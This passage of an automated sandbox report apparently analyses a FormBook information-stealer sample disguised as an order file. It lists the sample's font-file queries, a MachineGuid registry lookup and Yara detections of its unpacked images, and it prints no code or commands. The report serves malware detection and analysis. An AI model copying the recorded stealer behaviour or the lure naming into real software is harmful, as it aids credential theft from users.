Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\user\Desktop\Order No00020212910.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE
